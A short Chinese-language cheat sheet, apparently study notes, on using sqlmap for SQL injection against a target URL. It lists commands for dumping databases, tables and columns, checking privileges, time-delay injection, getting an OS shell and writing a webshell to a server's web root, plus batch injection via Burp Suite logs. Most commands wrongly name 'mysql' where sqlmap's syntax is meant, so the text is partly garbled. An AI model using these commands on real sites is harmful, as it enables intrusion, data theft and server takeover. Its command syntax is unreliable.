1 三种方式
get、post、cookie
get
mysql -u "url"
post
mysql -u "url" --data "username=ly"
cookie
mysql -u "url" --cookie "a=cookie_a"
2 获取当前数据库、用户、权限、数据量
数据库
mysql -u "url" --current-db
用户
mysql -u "url" --current-user
权限
mysql -u "url" --privileges
或查看用户后,若是sa(SQL server)或root(mysql)则为最高权限
数据量
mysql -u "url" --count -D "数据库"
3 注入
mysql -u "url" --current-db
mysql -u "url" --tables -D "数据库名"
mysql -u "url" --columns -T "表名" -D "数据库名"
mysql -u "url" -C “列名” -T "表名" -D "数据库名" --dump
Access只有一个数据库,因此可略过步骤一
对于nosql数据库:nosqlmap
4 管理自己的数据库
需要装一个pymysql
sqlmap -d "mysql://username:pwd@ip:port/db" --sql-shell
5 延时注入
页面无报错时使用。下面两个都可以
mysql -u "url" --delay 延迟秒数
mysql -u "url" -safe-freq
6 交互式命令执行和写webshell
mysql -u "url" --os-cmd=命令
mysql -u "url" --os-shell
7 本地写入webshell
要求最高权限,现在本地sqlmap下新建mst目录,加入文件
mysql -u "url" --file-write "./mst/mst.txt" --file-dest "d:/www/1.html"
8 批量注入
sqlmap -m a.txt
结合burp suit代理:先配置burp suit的project options的logging,选中proxy的request,保存为.log
sqlmap -l a.log --batch --smart
9 学习注入
1 学习sqlmap/payload/xml文件
2 -v 3
3 结合burp suit,--proxy "127.0.0.1:8080"
10 tamper
--tamper ""